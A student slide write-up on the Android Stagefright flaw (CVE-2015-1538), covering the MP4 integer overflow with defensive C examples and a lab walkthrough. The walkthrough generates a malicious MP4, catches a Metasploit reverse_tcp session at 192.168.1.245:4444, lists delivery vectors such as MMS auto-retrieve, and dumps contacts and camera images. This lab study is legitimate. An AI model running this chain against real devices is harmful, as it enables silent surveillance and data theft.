The document discusses the Stagefright vulnerability in Android devices. It describes how a specially crafted MP4 file can exploit a bug in the Stagefright media library and execute remote code on Android devices without any action from the user. The vulnerability affected over 95% of Android devices. It explains how the exploit works by triggering a buffer overflow using malformed MP4 chunks, and demonstrates compromising an Android device by sending a malicious MP4 file that establishes a reverse TCP connection to give the attacker access to files, contacts and the camera on the victim's device.
2. Android is a very modular operating system. Everything runs in separate processes, and there is a lot of inter-process communication. Android implements the concept of a "sandbox": a modified scheme based on Linux users and groups.
The security hole is in Android's core media handling library, libstagefright. libstagefright executes inside the "MEDIA SERVER" process.
Android Architecture
OVERVIEW
3. STAGEFRIGHT EXPLAINED
The Stagefright vulnerability was first reported by the security company Zimperium in July 2015. The bug allows remote code execution on Android devices and affected upward of 95% of Android devices at the time.
Stagefright itself is a software library (libstagefright), written in C++, that is built into the Android operating system. Zimperium's analysis showed that it is susceptible to memory corruption: an MMS message carrying a video that is composed in the right way can trigger malicious code on the device. The bug is so dangerous because it can compromise the victim's phone without any action from the victim, just by sending a plain MMS; MMS auto-retrieve makes it easy to exploit Android phones remotely. So, who has your phone number? Google has since released patches for the bug, but a further exploit based on libstagefright, known as Metaphor, has surfaced.
4. PROCESS ARCHITECTURE
The mediaserver process runs in the background. It is a native service started at boot from /init.rc, so init automatically restarts it when it crashes; a failed exploitation attempt therefore does not leave the device without a media service, and the attacker can simply try again.
Process privileges (Nexus 5): the last part of the service definition in /init.rc shows the privileges that the service runs with.
This service is highly privileged. Normal Android apps cannot request or receive group memberships such as audio, camera, drmrpc and mediadrm.
The groups granted to mediaserver give an attacker who controls it almost unlimited access:
- inet: can create AF_INET and AF_INET6 sockets, so the attacker can connect to any host on the internet.
- net_bt and net_bt_admin: the attacker can access and configure Bluetooth on the victim's device.
- camera: the attacker can control the victim's camera devices (front and back).
- audio: the attacker can record, play back and monitor audio.
5. An attacker who controls mediaserver can also control the storage on the victim's phone, restart adb and obtain shell access, and monitor the system server.
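The service definition the previous slide refers to, added here as an example rather than taken from the slide: it is the mediaserver entry as it appeared in AOSP's /init.rc of the Android 4.4/5.0 era. Group lists differ between versions and vendor builds, so verify it against /init.rc on the device you are looking at.

```text
service media /system/bin/mediaserver
    class main
    user media
    group audio camera inet net_bt net_bt_admin net_bw_acct drmrpc mediadrm
    ioprio rt 4
```

The line to notice is `user media`: the service does not run as root, so everything an attacker gains comes from the `group` line. On a live device, `adb shell ps | grep mediaserver` gives the PID and `adb shell cat /proc/<pid>/status` shows the Uid and Groups lines, which should match this definition.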
The MPEG-4 file format: to understand the Stagefright vulnerability (CVE-2015-1538) it helps to understand the structure of an MP4 file. An MP4 file is a collection of TLV (Type-Length-Value) chunks, also called atoms: each chunk carries a "type" value specifying the chunk type, a "length" value giving the data length, and the data itself.
In MPEG-4 the order is length first, then type, then value: a 32-bit big-endian length, a four-byte atom type, and then the data. The length counts the whole chunk including its 8-byte header. When the length is 0, the chunk extends to the end of the file. The atom field is a short string (also called a FourCC) that names the chunk type, for example "moov" or "mdat". Chunks that carry more than 2^32 bytes use a different structure from the plain TLV above: the 32-bit length is set to 1 and a 64-bit length follows the atom type.
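The chunk layout just described, as an added example written for this write-up (it is not code from the slides or from libstagefright): a minimal walker over the length/type/value chunks of an MP4 file that handles the two special length values, 0 (chunk runs to end of file) and 1 (a 64-bit length follows the FourCC), and refuses any chunk whose declared size does not fit the file. The input bytes are constructed for the example, not a real video.

```c
/* Added example (not code from the slides or from libstagefright): a minimal
 * walker over MP4 length/type/value chunks ("atoms"). Handles length 0
 * (chunk runs to EOF) and length 1 (64-bit length follows the FourCC), and
 * rejects chunks whose declared size does not fit the file.
 * Build: cc -std=c99 -Wall atoms.c */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

struct atom {
    char     type[5];   /* FourCC, NUL-terminated for printing */
    uint64_t hdr_len;   /* 8, or 16 when the 64-bit length is present */
    uint64_t size;      /* total chunk size, header included */
    uint64_t payload;   /* size - hdr_len */
};

static uint32_t be32(const uint8_t *p) {
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

static uint64_t be64(const uint8_t *p) {
    return ((uint64_t)be32(p) << 32) | be32(p + 4);
}

/* Parse the chunk header at buf[off]. Returns 1 on success, 0 when the
 * header is truncated or the declared size does not fit the file. */
int parse_atom(const uint8_t *buf, size_t len, size_t off, struct atom *out) {
    if (off > len || len - off < 8)
        return 0;                                   /* no room for a header */
    uint32_t size32 = be32(buf + off);
    memcpy(out->type, buf + off + 4, 4);
    out->type[4] = '\0';
    out->hdr_len = 8;
    if (size32 == 1) {                              /* extended 64-bit size */
        if (len - off < 16)
            return 0;
        out->size    = be64(buf + off + 8);
        out->hdr_len = 16;
    } else if (size32 == 0) {                       /* chunk runs to EOF */
        out->size = len - off;
    } else {
        out->size = size32;
    }
    /* A chunk shorter than its own header, or one that overshoots the file,
     * is malformed. This is the kind of bound a parser must enforce before
     * trusting a size field taken from the file. */
    if (out->size < out->hdr_len || out->size > len - off)
        return 0;
    out->payload = out->size - out->hdr_len;
    return 1;
}

/* Total size of the chunk at `off`, or -1 if it is malformed. */
long long atom_size_at(const uint8_t *buf, size_t len, size_t off) {
    struct atom a;
    return parse_atom(buf, len, off, &a) ? (long long)a.size : -1;
}

/* Walk every top-level chunk, printing it. Returns the number of chunks,
 * or -1 as soon as a malformed one is found. */
int walk_atoms(const uint8_t *buf, size_t len) {
    size_t off = 0;
    int n = 0;
    while (off < len) {
        struct atom a;
        if (!parse_atom(buf, len, off, &a))
            return -1;
        printf("%s at %zu: size=%llu payload=%llu\n", a.type, off,
               (unsigned long long)a.size, (unsigned long long)a.payload);
        off += (size_t)a.size;
        n++;
    }
    return n;
}

/* Constructed sample: 'ftyp' (12 bytes), a 'free' chunk using the 64-bit
 * length form (16-byte header + 2 bytes), and an 'mdat' with length 0 that
 * runs to the end of the file (8 + 3 bytes). 41 bytes in total. */
const uint8_t sample_mp4[] = {
    0x00,0x00,0x00,0x0c, 'f','t','y','p', 'i','s','o','m',
    0x00,0x00,0x00,0x01, 'f','r','e','e',
    0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x12, 0xaa,0xbb,
    0x00,0x00,0x00,0x00, 'm','d','a','t', 0x01,0x02,0x03,
};
const size_t sample_mp4_len = sizeof sample_mp4;

/* Constructed malformed headers: a size smaller than the 8-byte header,
 * and a size that claims more bytes than the file holds. */
const uint8_t bad_short_atom[]       = { 0x00,0x00,0x00,0x04, 'b','a','d','!' };
const size_t  bad_short_atom_len     = sizeof bad_short_atom;
const uint8_t bad_overshoot_atom[]   = { 0x00,0x00,0x00,0x20, 'm','o','o','v' };
const size_t  bad_overshoot_atom_len = sizeof bad_overshoot_atom;

int main(void) {
    int n = walk_atoms(sample_mp4, sample_mp4_len);
    printf("parsed %d chunks\n", n);
    printf("short atom -> %lld, overshooting atom -> %lld\n",
           atom_size_at(bad_short_atom, bad_short_atom_len, 0),
           atom_size_at(bad_overshoot_atom, bad_overshoot_atom_len, 0));
    return n == 3 ? 0 : 1;
}
```

The overshoot check is also the cheapest triage filter for suspect files: a chunk that declares a size larger than the remaining file is malformed whatever its type, and a scanner built on `parse_atom` rejects it before any of the chunk's contents are touched.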
6. So how does this all happen?
AwesomePlayer.cpp, written in C++, is the player code that runs when a media file is played on the victim's phone. The path from there to the bug is a chain of calls:
- AwesomePlayer::setDataSource_l(const sp<MediaExtractor> &extractor)
- which calls MPEG4Extractor::countTracks()
- which calls MPEG4Extractor::readMetaData()
- which hands the file to the chunk parser in MPEG4Extractor (MPEG4Extractor::parseChunk()), which is where we look next.
7. This is where the attack takes place: when the MP4 file is parsed.
The code in MPEG4Extractor.cpp collects every chunk of a given type it encounters and appends them all into one buffer: it takes the data accumulated so far (size bytes), allocates a new buffer of size + chunk_size bytes, copies the old data in and then reads chunk_size bytes of the new chunk from the file after it. The problem is that neither size nor chunk_size is checked before the addition, so a chunk_size chosen by the attacker makes size + chunk_size wrap around to a small value. This integer overflow is what the Stagefright exploit abuses.
Because the allocation is sized from the wrapped sum while the copy and the read still use the full size and chunk_size, the data is written into the buffer regardless of the buffer's actual allocated size, overflowing the heap.
With the heap carefully shaped, exploitation is straightforward. In this project we use the exploit published on Exploit-DB by Joshua Drake of Zimperium zLabs, who was the first to reveal the Stagefright vulnerability.
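The overflow described above, as an added example written for this write-up (not code from the slides or from AOSP). The chunk type the public CVE-2015-1538 exploit uses for this is 'tx3g', the text sample description; the affected devices were 32-bit, so size_t was 32 bits wide, and uint32_t models that here so the wrap-around reproduces on a 64-bit host. No memory is actually overrun: each routine only reports what it would allocate and whether the copy would exceed it. The rejection test in the hardened version follows the shape of the upstream fix as we understand it; treat the exact expression as ours, not as a quotation of the AOSP patch.

```c
/* Added example (not code from the slides or from AOSP): a model of the
 * size + chunk_size integer overflow in MPEG4Extractor's 'tx3g' handling.
 * `size` is the bytes accumulated from earlier chunks, `chunk_size` comes
 * straight from the chunk header in the file. uint32_t stands in for the
 * 32-bit size_t of the affected devices. Nothing is copied; we only compute
 * what each version would allocate and whether it would then overflow. */
#include <stdint.h>
#include <stdio.h>

typedef uint32_t target_size_t;            /* size_t on the 32-bit target */
#define TARGET_SIZE_MAX UINT32_MAX

struct alloc_plan {
    int           rejected;    /* 1 if the chunk was refused as malformed */
    target_size_t alloc_bytes; /* what new uint8_t[...] would receive */
    uint64_t      write_bytes; /* bytes the copy + read would actually write */
    int           overflows;   /* write_bytes > alloc_bytes */
};

/* Vulnerable pattern (pre-patch): the sum is truncated to size_t before the
 * allocation, but the copy still uses the full `size` and `chunk_size`. */
struct alloc_plan tx3g_append_vulnerable(target_size_t size, uint64_t chunk_size) {
    struct alloc_plan p = {0, 0, 0, 0};
    p.alloc_bytes = (target_size_t)((uint64_t)size + chunk_size); /* wraps */
    p.write_bytes = (uint64_t)size + chunk_size;
    p.overflows   = p.write_bytes > p.alloc_bytes;
    return p;
}

/* Hardened pattern: refuse the chunk when size + chunk_size cannot be
 * represented in size_t. chunk_size is range-checked first so that the
 * subtraction TARGET_SIZE_MAX - chunk_size cannot itself underflow.
 * (Check expression is ours; it follows the shape of the upstream fix.) */
struct alloc_plan tx3g_append_fixed(target_size_t size, uint64_t chunk_size) {
    struct alloc_plan p = {0, 0, 0, 0};
    if (chunk_size > TARGET_SIZE_MAX ||
        TARGET_SIZE_MAX - (target_size_t)chunk_size <= size) {
        p.rejected = 1;                 /* ERROR_MALFORMED in the real parser */
        return p;
    }
    p.alloc_bytes = size + (target_size_t)chunk_size;
    p.write_bytes = (uint64_t)size + chunk_size;
    p.overflows   = p.write_bytes > p.alloc_bytes;
    return p;
}

static void report(const char *label, struct alloc_plan p) {
    if (p.rejected)
        printf("%s: rejected as malformed\n", label);
    else
        printf("%s: alloc=%u bytes, would write=%llu bytes, overflow=%s\n",
               label, (unsigned)p.alloc_bytes, (unsigned long long)p.write_bytes,
               p.overflows ? "YES" : "no");
}

int main(void) {
    /* Constructed inputs: 16 bytes already accumulated from an earlier
     * 'tx3g' chunk, then a second chunk whose header claims 0xFFFFFFF8
     * bytes, so 16 + 0xFFFFFFF8 wraps to 8 in 32-bit arithmetic. */
    target_size_t accumulated = 16;
    uint64_t      hostile     = 0xFFFFFFF8ull;
    uint64_t      benign      = 50;
    report("vulnerable, hostile chunk", tx3g_append_vulnerable(accumulated, hostile));
    report("fixed,      hostile chunk", tx3g_append_fixed(accumulated, hostile));
    report("vulnerable, benign chunk ", tx3g_append_vulnerable(accumulated, benign));
    report("fixed,      benign chunk ", tx3g_append_fixed(accumulated, benign));
    return 0;
}
```

With the hostile chunk the vulnerable path allocates 8 bytes and then writes 0x100000008, which is the heap overflow the exploit shapes the heap around; the hardened path refuses the chunk before allocating anything. A chunk using the 64-bit length form with chunk_size above 2^32 is refused for the same reason, which is why the range check on chunk_size has to come first.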
8. CVE-2015-1538
The exploit is a Python program that triggers the integer overflow and turns it into a heap overflow. It generates a malicious MP4 file whose chunks and chunk sizes hijack mediaserver when the file is parsed; an attempt that only crashes mediaserver is not the end, because init restarts the service (under the media user, not as root) and the file can be parsed again.
The payload embedded in the MP4 file also contains the attacker's IP address and port; the victim's device connects back to them over a reverse TCP connection.
The script takes the host and port for the back-connection as arguments; these are used to establish the reverse_tcp connection from the victim's phone to the attacker machine.
The exploit can also be found on Joshua Drake's GitHub.
9. DEVICES USED
Attacker's machine: we used Kali Linux as the attacker machine, because of the flexibility Metasploit gives in managing the reverse TCP connection from the victim's phone.
Victim phones: we used two victim devices, one emulated Android device in VirtualBox and one real Android phone.
a) Emulated Android device on VirtualBox: Android 4.3
b) Real Android phone: not updated to 5.1
10. We ran the Stagefright Detector app on the victim device to see whether it is vulnerable to CVE-2015-1538; the app reports that it is.
11. THE ACTUAL ATTACK
How to leverage the CVE-2015-1538 exploit, from generating the MP4 file to the session on the phone:
- Set up the attacker machine
- Generate the malicious MP4 file
- Start a listener (reverse_tcp) on the attacker machine
- Send the file to the victim using one of the attack vectors
- Keep going once the attacker has got the connection
STEP 1 - Set up the attacker machine: check the IP address of the attacker machine. We used Kali Linux as the attacker machine to compromise the victim's Android phone.
Kali Linux: 192.168.1.245 | Port to listen on: 4444
STEP 2 - Generate the malicious MP4 file: the generated file, funny.mp4, can be seen in the screenshot.
12. STEP 3 - Start a listener on the attacker machine: there are many alternatives, netcat or Metasploit among them. In this project we used Metasploit to listen for the reverse TCP connection and drive the session afterwards. Metasploit offers far more functionality than the other utilities: we get a Meterpreter session and can perform numerous tasks from it, from accessing the cameras and the microphone to getting shell access, listing processes and so on.
First choose the module: here we only need the generic handler (exploit/multi/handler), which receives the connection back from the victim's phone.
Next set a reverse_tcp payload to receive the back-connection, and define its configuration: LHOST and LPORT (the attacker's IP address and the port to listen on).
Once the configuration is set, start the listener with the exploit command. It then waits for a back-connection from the victim's phone to the attacker machine on port 4444, the port we configured into the malicious MP4 file.
13. STEP 4 - Send the file to the victim using one of numerous attack vectors. In general there are more than eleven ways to deliver it:
- MMS: the most dangerous vector. The media file is auto-downloaded and parsed on the victim's phone, so the phone is compromised without the victim knowing it.
- Web browser: the attacker can embed the malicious MP4 file behind a web link sent to the victim; if the user clicks the link, the reverse TCP connection is established.
- Browser auto-download: if the browser can auto-download a media file, the victim's phone can be compromised without a click.
- Email: send the malicious MP4 file as an email attachment.
- Social networks: chat clients such as Hangouts, WhatsApp and Facebook Messenger can be used to send the link or the file; if auto-download is enabled, the victim's phone is compromised.
- SD card: an attacker with physical access to the victim's SD card can place the MP4 file on it; when the card is mounted, the phone is compromised.
There are many more ways to deliver the MP4 file, because the vulnerable parsing code is invoked all over the Android system: whenever a thumbnail is rendered or metadata is needed, on rotating the screen, launching the Messaging app, opening Gallery, sharing the malicious media file, and more.
In this project we used email as the attack vector, and a virtual Android device as the victim.
14. When the victim's phone parses the video, the payload takes over mediaserver and sends a back-connection to our attacker machine, which is waiting for it. An attempt that merely crashes mediaserver is not fatal to the attack: init restarts the service (under the media user, not as root).
STEP 5 - Keep going after the attacker has got the connection: once the victim has received the MP4 file and either downloaded or auto-downloaded it, Metasploit gets the back-connection and opens a Meterpreter session.
15. A Meterpreter session has been opened; we can check which processes are running on the victim's phone with the ps command.
Next, let's check the IP address and interface details of the victim's phone.
16. Let's see whether we can pull the system information of the victim's phone: the sysinfo command in Meterpreter provides the system details.
An attacker can also get shell access on the victim's phone, and list the folders and files of the Android filesystem with the ls command in that shell.
Check whether the device is rooted.
An attacker can also dump the contacts from the victim's phone.
17. Let's look into the contacts dump file.
An attacker can also control the camera: webcam_list gives the list of cameras available on the device. On our emulated device only the back camera is configured, with no actual hardware behind it. Let's take a picture from the emulated Android's camera.
18. MITIGATION
- Update the device: update your device to the latest released version. If no update is available for a specific device, install a maintained alternative Android distribution such as CyanogenMod.
- Turn off auto-download: a partial mitigation is to turn off auto-download of media files in all file-sharing apps, social media apps, MMS and the browser. This only protects against the media file executing remote code automatically; the device can still be compromised if the user plays the video or downloads the MP4 file.
Hangouts: disable auto-download of messages:
- Open Hangouts
- Tap the menu in the top left corner
- Tap Settings -> SMS
- Under General, if Hangouts SMS is enabled, go to Advanced and uncheck "Auto retrieve MMS"
19. AUTHORS
Mamoon Ismail Khalid, Computer Science Graduate Student, New York University
Parul Sharma, Cybersecurity Graduate Student, New York University
Sahir Riyaz Khan, Cybersecurity Graduate Student, New York University